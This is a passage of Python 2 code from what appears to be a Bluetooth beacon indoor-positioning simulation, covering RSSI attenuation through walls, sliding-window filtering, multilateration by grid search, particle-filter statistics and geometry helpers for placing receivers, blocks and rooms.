#print "receiverBeaconBlockIntersection" + str(receiverBeaconBlockIntersection)
isCollision=True
weakeningAmount+=np.linalg.norm(receiverBeaconBlockIntersection[0,:]-receiverBeaconBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ] * np.random.uniform(0.5,1.5) # add some +- noise
# adding noise per obstacle is also appropriate for real life
# actually the wall material should also be taken into account here; the coefficients were per 1 meter after all
# so it should be distance/1 * coefficient, i.e. distance (in meters) * coefficient
for roomIndex, roomPosition in enumerate(roomPositions):
receiverBeaconRoomIntersection=findRectangleLineSegmentIntersectionPoints(receiverPosition,self.beacon_pos,roomPosition,roomWidth,roomLength)
if receiverBeaconRoomIntersection is not None:
#print "receiverBeaconRoomIntersection" + str(receiverBeaconRoomIntersection)
isCollision=True
weakeningAmount+=np.linalg.norm(receiverBeaconRoomIntersection[0,:]-receiverBeaconRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ] * np.random.uniform(0.5,1.5)
# * some coefficient (so the signal does not weaken too much inside a room); weakening by about as much as the room's walls is enough, which is roughly 1/8 of the room (considering the 2 walls we cross)
strengtheningAmount=0 # (distance between the receiver and the mean of the particles) / 1 meter * ( how many dBm to reduce for 1 meter)
# the calculations below are not real. They are our prediction by looking at the mean value of the particles
# if the mean of the prev calculations and the beacons have a block or room in between, we better increase the signal
# this simulates after receiving the signal in real life (post processing of the signal)
isMeanReceiverCollision=False # this is used to strengthen the received signal in case there was a block in between previously
if self.mu is not None: # do not use "!= None" here because it errors when mu is an array
for blockIndex, blockPosition in enumerate(blockPositions):
receiverMeanBlockIntersection = findRectangleLineSegmentIntersectionPoints(receiverPosition,self.mu,blockPosition,blockWidth,blockLength)
if receiverMeanBlockIntersection is not None:
#print "receiverMeanBlockIntersection" + str(receiverMeanBlockIntersection)
isMeanReceiverCollision=True
strengtheningAmount+=np.linalg.norm(receiverMeanBlockIntersection[0,:]-receiverMeanBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ]
for roomIndex, roomPosition in enumerate(roomPositions):
receiverMeanRoomIntersection = findRectangleLineSegmentIntersectionPoints(receiverPosition,self.mu,roomPosition,roomWidth,roomLength)
if receiverMeanRoomIntersection is not None:
#print "receiverMeanRoomIntersection" + str(receiverMeanRoomIntersection)
isMeanReceiverCollision=True
strengtheningAmount+=np.linalg.norm(receiverMeanRoomIntersection[0,:]-receiverMeanRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ]
if isCollision:
##print "No Line Of Sight between receiver " + str(receiverPosition) + " and beacon " + str(self.beacon_pos)
#res_unprocessedRSSI=( weakenedSignal(res_unprocessedRSSI,maxSignalError) + res_unprocessedRSSI ) / 2.0 #weaken a bit, but not weaken upto max signal error
res_unprocessedRSSI-=weakeningAmount
else:
pass
##print "Direct Line Of Sight between receiver " + str(receiverPosition) + " and beacon " + str(self.beacon_pos)
res_processedRSSI=res_unprocessedRSSI
if isMeanReceiverCollision:
res_processedRSSI+=strengtheningAmount
##print "increased signal strength since there was a wall between the receiver and the beacon in the previous step according to our particle calculations"
# ONE MORE CHECK FOR SLIDING WINDOWS #
# each receiver should have a sliding window
# max slidingWindows size should be 7
slidingWindow = self.slidingWindows[receiverIndex]
while len(slidingWindow) >=7:
##print "prev size of the window is: " + str( len(self.slidingWindows) )
slidingWindow.popleft() # delete oldest element
##print "after size of the window is: " + str( len(self.slidingWindows) )
slidingWindow.append(res_processedRSSI) # appends at the right
##print "final size of the window is: " + str( len(self.slidingWindows) )
if self.filterAndCheckSignal(minUsefulSignal,receiverIndex) and res_processedRSSI > minSignalValue:
##print "filtering was successful"
self.RSSIofReceivers.append( res_processedRSSI )
self.UnprocessedRSSIofReceivers.append( res_unprocessedRSSI )
else:
##print "filtering was not successful"
self.RSSIofReceivers.append( None )
self.UnprocessedRSSIofReceivers.append( None )
receiverIndex+=1
def filterAndCheckSignal(self,minUsefulSignal,receiverIndex):
mean=0.0
sum=0.0
slidingWindow = self.slidingWindows[receiverIndex]
if len(slidingWindow) < 3:
return False
else:
noOutlierDeque=col_deque(sorted(slidingWindow) )
noOutlierDeque.popleft() # delete smallest
noOutlierDeque.pop() # delete greatest
for signalVal in noOutlierDeque:
sum+=signalVal
mean=sum/len(noOutlierDeque)
return mean >= minUsefulSignal
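# Hedged example of the window filter above (illustrative values): with a sliding window of
# [-88, -95, -86, -90, -79], sorting and dropping the smallest (-95) and largest (-79) leaves
# [-90, -88, -86], whose mean is -88 dBm; the receiver is kept only if that trimmed mean is
# >= minUsefulSignal (-90 dBm in this configuration).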
# if RSSI is lower than -90dBm , then omit this receiver ( assuming we use 0dBm signal powered beacons)
def setBeaconDistances_fromRSSIs(self,minUsefulSignal):
self.distToReceivers[:] = []
for RSSIofReceiver in self.RSSIofReceivers:
#print "rssi of receiver is: " + str(RSSIofReceiver)
if RSSIofReceiver is not None and \
RSSIofReceiver > minUsefulSignal:
self.distToReceivers.append( RSSI_to_distance( RSSIofReceiver ) + safetyOffset ) # add safetyOffset to avoid divide by zero in the custom_minimize function
else:
self.distToReceivers.append( None )
# NumberOfParticles for 4 RECEIVER
def multiLateration(self,xdims,ydims,sensitivityOfResult):
receiverPositionsArray=np.array(self.receiverPositions)
##print "elements are : " + str( elements )
#resultingPoint = Trilaterate(rp1.coord,elements[0],rp2.coord,elements[1],rp3.coord,elements[2])
#resultingPoint = minimize_dist_error(elements,np.vstack(coordinates ),xdims,ydims )
#with open('deneme.txt', 'a') as the_file:
# the_file.write("beacon_pos is: " + str(self.beacon_pos) + "\n" )
#print "beacon_pos is: " + str(self.beacon_pos)
# if checkForBlocks == True, it also considers blocks for minimization in the disadvantage of time consumption
# checkForBlocks means include None info to make multi lateration calculations
resultingPoint = custom_minimize(self.RSSIofReceivers,np.vstack(receiverPositionsArray ),xdims,ydims,sensitivityOfResult,checkForBlocks=True )
return resultingPoint
def calc_PDF(self,strongSignalDistance,pastCoeff):
numberOfNotNones=0
numberOfStrongSignals=0
confidenceEllipseMultiplier=1
for distToReceiver in self.distToReceivers:
if distToReceiver is not None:
numberOfNotNones+=1
#print "dist to receiver is: " + str(distToReceiver)
if distToReceiver < strongSignalDistance:
numberOfStrongSignals+=1
"""returns mu and variance of the weighted particles"""
self.mu = np.average(self.particles, weights=self.weights, axis=0)
#var = np.average((particles - mu)**2, weights=weights, axis=0)
self.covMatrix = np.cov(m=self.particles, rowvar=False, aweights=self.weights) # rowvar has to be False otherwise each row represents a variable, with observations in the columns.
# https://docs.scipy.org/doc/numpy-1.15.0/reference/generated/numpy.cov.html
self.max_weighted_particle = self.particles[np.argmax(self.weights) ]
if numberOfNotNones >=3:
if numberOfStrongSignals >= 3:
confidenceEllipseMultiplier=1 # No change
elif numberOfStrongSignals == 2:
confidenceEllipseMultiplier=1.25
elif numberOfStrongSignals == 1:
confidenceEllipseMultiplier=1.5
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=2
# x1.6 worse than the >=3 case
elif numberOfNotNones == 2:
if numberOfStrongSignals == 2:
confidenceEllipseMultiplier=2
elif numberOfStrongSignals == 1:
confidenceEllipseMultiplier=2.4
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=3.2
# x3 worse than the >=3 case
elif numberOfNotNones == 1:
if numberOfStrongSignals == 1:
confidenceEllipseMultiplier=4.5
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=6.0
# x5 worse than the >=3 case
else: # numberOfNotNones == 0:
#confidenceEllipseMultiplier=float("inf") # with inf, no ellipse would be drawn at all
confidenceEllipseMultiplier=10.0 # let 10.0 be our maximum, for example
self.covMatrix*=confidenceEllipseMultiplier
# if pastCoeff == 1, then except for the first iteration covMatrix would always equal the previous one, i.e. the covariance found in the first iteration would remain the estimate forever
if self.prevCovMatrix is not None:
self.covMatrix=self.covMatrix*(1-pastCoeff) + pastCoeff*self.prevCovMatrix
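# Hedged example of the blending above: with pastCoeff = 0.2 the stored covariance is
# 0.8 * current + 0.2 * previous, i.e. an exponential smoothing of the confidence ellipse
# across iterations.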
# ellipse center, ellipse width/height, 2 ends of the line segment
def findEllipseLineSegmentIntersectionPoints(ellipseCenter,width,height, p1,p2):
if ( np.array_equal(p1,p2) ):
return None
centerPoint = Point(ellipseCenter)
unitCircle = centerPoint.buffer(1).boundary
ellipse=shapely.affinity.scale(unitCircle,width,height)
line = LineString([p1,p2])
if ellipse.intersects(line):
intersectionPointObject = ellipse.intersection(line)
intersectionPoint=np.array([intersectionPointObject.coords[0],intersectionPointObject.coords[1]])
#print "ellipse line intersection is: " + str(intersectionPoint)
#intersectionPoint=np.asarray(intersectionResult.geoms[0].coords[0],intersectionResult.geoms[1].coords[0])
else:
intersectionPoint=None
return intersectionPoint
def checkFirstRectangleContainsSecondRectangle(rectCenter,rectWidth,rectLength, rectCenter2,rectWidth2,rectLength2,boundaryForFirstRect=0,boundaryForSecondRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect),-(rectLength/2 + boundaryForFirstRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect) ,rectLength/2 + boundaryForFirstRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,-(rectLength/2 + boundaryForFirstRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,rectLength/2 + boundaryForFirstRect])
bottomLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect),-(rectLength2/2 + boundaryForSecondRect) ])
topLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect) ,rectLength2/2 + boundaryForSecondRect])
bottomRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,-(rectLength2/2 + boundaryForSecondRect) ])
topRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,rectLength2/2 + boundaryForSecondRect])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
rectangle2 = Polygon([bottomLeftCorner2, topLeftCorner2, topRightCorner2, bottomRightCorner2])
return rectangle.contains(rectangle2)
def checkRectangleRectangleIntersection(rectCenter,rectWidth,rectLength, rectCenter2,rectWidth2,rectLength2,boundaryForFirstRect=0,boundaryForSecondRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect),-(rectLength/2 + boundaryForFirstRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect) ,rectLength/2 + boundaryForFirstRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,-(rectLength/2 + boundaryForFirstRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,rectLength/2 + boundaryForFirstRect])
bottomLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect),-(rectLength2/2 + boundaryForSecondRect) ])
topLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect) ,rectLength2/2 + boundaryForSecondRect])
bottomRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,-(rectLength2/2 + boundaryForSecondRect) ])
topRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,rectLength2/2 + boundaryForSecondRect])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
rectangle2 = Polygon([bottomLeftCorner2, topLeftCorner2, topRightCorner2, bottomRightCorner2])
return rectangle.intersects(rectangle2)
# ellipse center, ellipse width/height, rectangle center/width/length
def checkEllipseRectangleIntersection(ellipseCenter,width,height, rectCenter,rectWidth,rectLength,boundaryForRect=0):
# CORNERS
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
#print "bottomLeftCorner is: " + str(bottomLeftCorner)
#print "topRightCorner is: " + str(topRightCorner)
#print "room position is " + str(rectCenter)
centerPoint = Point(ellipseCenter)
unitCircle = centerPoint.buffer(1).boundary
ellipse=shapely.affinity.scale(unitCircle,width,height)
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
return ellipse.intersects(rectangle)
def checkPointInsideRectangle(point,rectCenter,rectWidth,rectLength,boundaryForRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
point = Point(point)
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
return point.intersects(rectangle)
# if the line intersects the rectangle at only 1 point (which could be the rectangle's corner), we can return None since there is almost no intersection
# it may intersect at infinitely many points when the segment lies on the same line as an edge
# besides, when checking x,y this lowers the chances of points inside the room, because points inside the room always intersect, whatever the wall thickness
# actually this does not handle entering the room (my green beacon cannot enter the room anyway, but if it could, the intersection check should not apply inside the room)
# actually if the line segment endpoint, i.e. x,y, is inside the room it should not be accepted at all (by the simulation it cannot be there, but for now I assume rooms are never entered)
# for now points inside the room are at least slightly penalized; leave it like this, their chance is low anyway since we can never get very close to them
# preventing the infinite-intersection and single-point-intersection cases is enough for now
# actually 'contains' also means intersecting at infinitely many points, so in that case it returns the first and last intersection points of the line
# or maybe it treats the rectangle's interior as empty and points inside the room are never penalized, I am not sure
def findRectangleLineSegmentIntersectionPoints(p1,p2,rectCenter,rectWidth,rectLength,boundaryForRect=0):
# CORNERS
if np.array_equal(p1,p2):
return None
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
line = LineString([p1,p2])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
#print "findRectangleLineSegmentIntersectionPoints"
if rectangle.intersects(line):
intersectionPointObject = rectangle.intersection(line)
#print intersectionPointObject.coords[0]
#print intersectionPointObject.coords[1]
#print np.array(intersectionPointObject.coords).shape
if np.array_equal(np.array(intersectionPointObject.coords).shape,np.array([2, 2])):
intersectionPoint=np.array([intersectionPointObject.coords[0],intersectionPointObject.coords[1]])
else:
intersectionPoint=None
#print "rectangle line intersection is: " + str(intersectionPoint)
#intersectionPoint=np.asarray(intersectionResult.geoms[0].coords[0],intersectionResult.geoms[1].coords[0])
else:
intersectionPoint=None
return intersectionPoint
def generateRandomMACID():
return ':'.join('%02x'%np.random.randint(0,256) for _ in range(6))
# if a signal arriving at a receiver is still strong despite attenuation, it is more valuable than the other, weaker signals
# therefore a signal with a small distToReceivers value means more to us
# since we want that value to be small, scaling the error term by it makes the sum smaller, which increases the chance of obtaining the point we want
# if the [x,y] point checked for multilateration differs from the BLE fingerprinting result by more than +-2 dBm, penalize it, since such points are less likely
def custom_minimize(RSSIofReceivers, receiverPositions,xdims,ydims,sensitivityOfResult=1.0,checkForBlocks=True):
mysum=float("inf")
maxCatchableSignalDistance = RSSI_to_distance( minUsefulSignal ) + safetyOffset
#print "maxCatchableSignalDistance is: " + str(maxCatchableSignalDistance)
resultingPoint=[-1,-1]
for x in np.arange(xdims[0],xdims[1],sensitivityOfResult):
for y in np.arange(ydims[0],ydims[1],sensitivityOfResult):
# if x,y collides with a block or room, this position would not be possible
isPointOnObstacle=False
for blockPosition in blockPositions: # it will not enter this loop if there are no blocks
if checkPointInsideRectangle([x,y],blockPosition,blockWidth,blockLength):
isPointOnObstacle=True
break
if not isPointOnObstacle:
for roomIndex,roomPosition in enumerate(roomPositions):
if checkPointInsideRectangle([x,y],roomPosition,roomWidth[roomIndex],roomLength[roomIndex]):
isPointOnObstacle=True
break
if isPointOnObstacle:
continue # this point cannot be what we are looking for
tmp_sum=0
for i in range(len(receiverPositions)):
strengtheningAmount=0
for blockIndex, blockPosition in enumerate(blockPositions): # it will not enter this loop if there are no blocks
receiverMeanBlockIntersection = findRectangleLineSegmentIntersectionPoints(receiverPositions[i],np.array([x,y]),blockPosition,blockWidth,blockLength)
if receiverMeanBlockIntersection is not None:
#print "receiverMeanBlockIntersection" + str(receiverMeanBlockIntersection)
strengtheningAmount+=np.linalg.norm(receiverMeanBlockIntersection[0,:]-receiverMeanBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ]
for roomIndex, roomPosition in enumerate(roomPositions):
# when trying all possible x and y, this x and y should not be equal to the receiver's position, since it would not form a line
# if it is equal to the receivers position, the intersection should return None
# so findRectangleLineSegmentIntersectionPoints function should return None if points to make the lines are equal
# also if intersection is at a corner(which means intersect only at 1 point, then it should return None for this case as well since intersection dist would be zero already)
receiverMeanRoomIntersection = findRectangleLineSegmentIntersectionPoints(receiverPositions[i],np.array([x,y]),roomPosition,roomWidth[roomIndex],roomLength[roomIndex])
if receiverMeanRoomIntersection is not None:
#print "receiverMeanRoomIntersection" + str(receiverMeanRoomIntersection)
strengtheningAmount+=np.linalg.norm(receiverMeanRoomIntersection[0,:]-receiverMeanRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ]
xyDistToRec = np.linalg.norm( [x,y] - receiverPositions[i] )
if RSSIofReceivers[i] is not None:
distToReceiverGivenRSSI=RSSI_to_distance( RSSIofReceivers[i] + strengtheningAmount) + safetyOffset
tmp_sum+=( abs( xyDistToRec - distToReceiverGivenRSSI ) / distToReceiverGivenRSSI ) ** 2
# do this only if it has been None for 5 consecutive iterations, not immediately when it is None -> the signals are already adjusted accordingly before being passed here
else: # if distToReceivers[i] is None, [x,y] should not be able to get closer than a certain distance to this receiver (penalize it if it is closer)
# the closer [x,y] is to receiverPositions[i], the more we penalize it
# distToReceivers[i] is something we set ourselves anyway, i.e. our estimate; we could instead use, say, 10 m and measure how much it deviates from that
# but for us, the closer it is the worse, since we expect a certain minimum distance, so use 1/([x,y]-receiverPositions) instead of 1/distToReceivers
#if checkForBlocks:
maxCatchableSignalDistance = RSSI_to_distance( minUsefulSignal + strengtheningAmount) + safetyOffset
if xyDistToRec < maxCatchableSignalDistance: # we see it as None, so it should not be closer than maxCatchableSignalDistance. If so, then punish
tmp_sum+=( abs( xyDistToRec - maxCatchableSignalDistance ) / xyDistToRec ) ** 2
if tmp_sum < mysum:
mysum = tmp_sum
resultingPoint=[x,y]
return resultingPoint
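# Hedged toy example of the cost minimized above (made-up numbers): for a candidate point whose
# geometric distances to two reporting receivers are 2.0 m and 4.0 m while the RSSI-derived
# distances are 2.5 m and 3.0 m, the contribution is
#   ((|2.0 - 2.5|) / 2.5)**2 + ((|4.0 - 3.0|) / 3.0)**2 = 0.04 + 0.111 ~= 0.15
# receivers reported as None instead add a penalty only when the candidate lies closer to them
# than the maximum catchable-signal distance.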
# after the signal is transmitted, it may have hit a wall and lost strength.
# since we cannot manipulate it after transmission is done, we reduce the signal at transmit time, assuming it may hit something with some probability
# and we may have to increase it back with some probability as well
def weakenedSignal(RSSI,maxSignalError):
return RSSI - uniform(0,maxSignalError)
def create_uniform_particles(x_range, y_range, NumberOfParticles):
particles = np.empty((NumberOfParticles, 2))
particles[:, 0] = uniform(x_range[0], x_range[1], size=NumberOfParticles)
particles[:, 1] = uniform(y_range[0], y_range[1], size=NumberOfParticles)
return particles
# for each receiver hold a separate signal strength map
# each beacon has its interpolation over the whole map; then we should take a weighted average of these beacons' signal strength values
# For example, FOR RECEIVER 1, if beacon1 is at [5,5] and beacon2 is at [10,3] and the point we want to interpolate is at [10,5], beacon2 should have the higher vote in determining the signal strength
# signal strength values of the beacons (fingerprint positions) are different for each receiver, therefore we hold a separate map for each receiver
def interpolateFingerPrintingResult():
xElems=np.arange(xdims[0],xdims[1],sensitivityOfResult)
yElems=np.arange(ydims[0],ydims[1],sensitivityOfResult )
allPosDistancesToReceivers={} # make it a dictionary where the key is 2d position
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
allPosDistancesToReceivers[i,x,y]=np.linalg.norm(receiverPositions[i]- [x,y])
numberOfBeacons=fingerPrintingSignalStrengthBeaconsToReceivers.shape[1]
allPosDistancesToBeacons={} # make it a dictionary where the key is 2d position
for k in range(numberOfBeacons):
for x in xElems:
for y in yElems:
allPosDistancesToBeacons[k,x,y]=np.linalg.norm(fingerPrintingBeaconPositions[k]- [x,y])
# INITIALIZE INTERPOLATION MAP FOR EACH RECEIVER
global interpolatedSignalStrenghForAllPositions_forEachReceiver
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
interpolatedSignalStrenghForAllPositions_forEachReceiver[i,x,y]=0
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
minDist=np.float('inf')
min_k=0
# find the closest beacon to [x,y]
for k in range(numberOfBeacons):
if allPosDistancesToBeacons[k,x,y] < minDist:
min_k=k
minDist = allPosDistancesToBeacons[k,x,y]
base_dist=np.linalg.norm(fingerPrintingBeaconPositions[min_k]-receiverPositions[i])
target_dist=allPosDistancesToReceivers[i,x,y]
base_RSSI=fingerPrintingSignalStrengthBeaconsToReceivers[i][min_k]
# whichever beacon or receiver is the closest to [x,y], it should determine the interpolation result
# or, if the receivers are closer to those points, leave them at 0 etc.
# and at the very end let the receiver provide these estimated values as if there were no blocks at all
interpolatedSignalStrenghForAllPositions_forEachReceiver[i,x,y]+=calc_relative_RSSI(base_dist,target_dist,base_RSSI)
print calc_relative_RSSI(base_dist,target_dist,base_RSSI)
print interpolatedSignalStrenghForAllPositions_forEachReceiver
def calc_relative_RSSI(base_dist, target_dist, base_RSSI):
if target_dist >= 1:
return base_RSSI - 20 * np.log10( target_dist / (base_dist+safetyOffset) ) # log10 to stay consistent with the path-loss model used in distance_to_RSSI
else:
return zero_one_meter_distance_to_RSSI(target_dist)
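# Hedged example (assumed values): with base_RSSI = -71 dBm measured at base_dist = 2 m,
# interpolating to target_dist = 4 m gives roughly -71 - 20*log10(4/2) ~= -77 dBm,
# consistent with the path-loss exponent of 2 used in distance_to_RSSI below.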
#distance in meters, returns RSSI in dBm
# assuming the signal propagation constant is 2, https://www.rn.inf.tu-dresden.de/dargie/papers/icwcuca.pdf, equation (4)
# when the distance goes from 4 to 8, the log term goes from 0.6 to 0.9 (the output is multiplied by a negative), so the output decreases more slowly as the distance grows
# in zero_one_meter_distance_to_RSSI, on the other hand, if dist goes from 0.1 to 0.2 the result goes from 0.15 to 0.34 -> i.e. the RSSI drops faster
def distance_to_RSSI(distance):
res_RSSI = 0
##print "distance is: " + str(distance)
if distance >=1:
res_RSSI = -20 * np.log10(distance) + rssiAtOne
else:
res_RSSI = zero_one_meter_distance_to_RSSI(distance)
return float(res_RSSI)
#RSSI in dBm, returns distance in meter
def RSSI_to_distance(RSSI):
res_distance = 0
if RSSI <= rssiAtOne:
res_distance = 10**( (RSSI-rssiAtOne) / -20 )
else:
res_distance = zero_one_meter_RSSI_to_distance(RSSI)
return float(res_distance)
# EXPONENTIAL FUNCTION BETWEEN 0 and 1
def zero_one_meter_RSSI_to_distance(RSSI):
#return float( np.log( (np.e - 1)/rssiAtOne * RSSI + 1 ) )
return 10**( ( ( RSSI - TX_Power ) * np.log10(2) ) / (rssiAtOne - TX_Power) ) -1
# should return something between TX power and rssiAtOne
def zero_one_meter_distance_to_RSSI (dist):
#return float( rssiAtOne * ( (np.exp(dist) - 1) / (np.e - 1) ) )
return float( TX_Power + (rssiAtOne - TX_Power) * ( (np.log10(dist+1)) / (np.log10(2) ) ) )
#float( (1-dist)*TX_Power + dist*rssiAtOne
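# Hedged sanity check, computed from the constants above (TX_Power = 0, rssiAtOne = -65):
#   distance_to_RSSI(2.0) = -20*log10(2) + (-65) ~= -71.0 dBm
#   RSSI_to_distance(-71.0) = 10**((-71.0 + 65) / -20) ~= 2.0 m
# so the two functions invert each other for distances >= 1 m; below 1 m the
# zero_one_meter_* pair above is used instead.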
# N_eff : Effective weight number
def neff(weights):
return 1.0 / np.sum(np.square(weights))
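# Hedged example: for N uniformly weighted particles neff == N; if a single particle carries all
# the weight neff == 1. Resampling in animate() is triggered once neff drops below NumberOfParticles/2.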
def getReceiverPositionsToInstall(xdims,ydims,numberOfReceivers):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
#reaOfTheMap=int( (ymax-ymin)*(xmax-xmin) )
step_size=(1/( np.ceil(np.sqrt(numberOfReceivers*1000) ) ) )
while True:
#initial_points=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax], size=(areaOfTheMap*2,2)) # I deleted .tolist()
#x_step_size=(xdims[1]-xdims[0])/3
#y_step_size=(ydims[1]-ydims[0])/3
#print "step_size is: " + str(step_size)
initial_points = np.mgrid[0:1+step_size:step_size, 0:1+step_size:step_size].reshape(2,-1).T
receiverPositions = KMeans(n_clusters=numberOfReceivers, random_state=0,n_init=100).fit(initial_points).cluster_centers_
#receiverPositions=kmeans(initial_points,numberOfReceivers)
if receiverPositions is not None:
##print "initial receiver positions area " + str(receiverPositions)
receiverPositions[:,0]=xmin+receiverPositions[:,0]*(xmax-xmin)
receiverPositions[:,1]=ymin+receiverPositions[:,1]*(ymax-ymin)
##print "after receiverPositions are " + str(receiverPositions)
return receiverPositions
#return initial_points
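# Hedged note on the placement above: for numberOfReceivers = 3 the step size is 1/ceil(sqrt(3000)) = 1/55,
# so roughly 3000 grid points over the unit square are clustered by KMeans into 3 centroids, which are then
# rescaled to the map extents; this spreads the receivers approximately evenly over the room.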
def getBlockPositionsToInstall(xdims,ydims,numberOfBlocks):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
numberOfBlocksCreated=0
blockPositionsToInstall=[]
while numberOfBlocksCreated!=numberOfBlocks:
blockCoord=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax])
collisionExists=False
for receiverPosition in receiverPositions:
if checkRectangleRectangleIntersection(blockCoord,blockWidth,blockLength,receiverPosition,receiverWidth,receiverLength):
collisionExists=True
break
intersectionWithOtherBlocksExists=False
if not collisionExists: # if collision exists, do not make other checks
for blockPosition in blockPositionsToInstall:
if checkRectangleRectangleIntersection(blockCoord,blockWidth,blockLength,blockPosition,blockWidth,blockLength):
intersectionWithOtherBlocksExists=True
break
if not collisionExists and not intersectionWithOtherBlocksExists:
blockPositionsToInstall.append(blockCoord)
numberOfBlocksCreated+=1
#print numberOfBlocksCreated
return np.array(blockPositionsToInstall)
def getRoomPositionsToInstall(xdims,ydims,numberOfRooms,roomBoundary):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
numberOfRoomsCreated=0
roomPositionsToInstall=[]
while numberOfRoomsCreated!=numberOfRooms:
roomCoord=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax])
receiverHollowRoomCollisionExists=False
for receiverPosition in receiverPositions:
if not checkFirstRectangleContainsSecondRectangle(roomCoord,roomWidth,roomLength,receiverPosition,receiverWidth,receiverLength,boundaryForFirstRect=-roomBoundary) and \
checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,receiverPosition,receiverWidth,receiverLength,boundaryForFirstRect=roomBoundary):
receiverHollowRoomCollisionExists=True
break
intersectionWithBlocksExists=False
if not receiverHollowRoomCollisionExists:
for blockPosition in blockPositions:
if checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,blockPosition,blockWidth,blockLength,boundaryForFirstRect=roomBoundary):
intersectionWithBlocksExists=True
break
intersectionWithOtherRoomsExists=False
if not receiverHollowRoomCollisionExists and not intersectionWithBlocksExists:
for roomPosition in roomPositionsToInstall:
if checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,roomPosition,roomWidth,roomLength,boundaryForFirstRect=roomBoundary,boundaryForSecondRect=roomBoundary):
intersectionWithOtherRoomsExists=True
break
if not receiverHollowRoomCollisionExists and not intersectionWithBlocksExists and not intersectionWithOtherRoomsExists:
roomPositionsToInstall.append(roomCoord)
numberOfRoomsCreated+=1
#print numberOfRoomsCreated
return np.array(roomPositionsToInstall)
# main function
# strongSignalDistance -> to how many meters we accept this signal as strong. We use it for confidence ellipse calculations
# sensitivityOfResult -> how much sensitive we are about the final position of our object of interest
# maxSignalError -> signals are erroneous in real life; to simulate this, add noise of up to this amount
# minUsefulSignal -> min signal value we use for distance calculation
# minSignalValue -> min signal that we can still find, if a signal is lower than that(if receiver is far away), then this receiver(s) cannot catch this signal.
# movingLimit -> how many meters at a time our object moves at max
# movingTendency -> in what direction and meters our object tends to move
def animate_dummy_init():
pass
def animate(iterNo, macID, currPerson, NumberOfParticles, xdims=(0, 50), ydims=(0, 50), maxSignalError=20, movingLimit=2, pastCoeff=0, minUsefulSignal=-90,
minSignalValue=-100,numberOfReceivers=4, sensitivityOfResult=1.0, strongSignalDistance=5 , movingTendency=np.array([0,0]) ):
print "iterNo is: ", iterNo
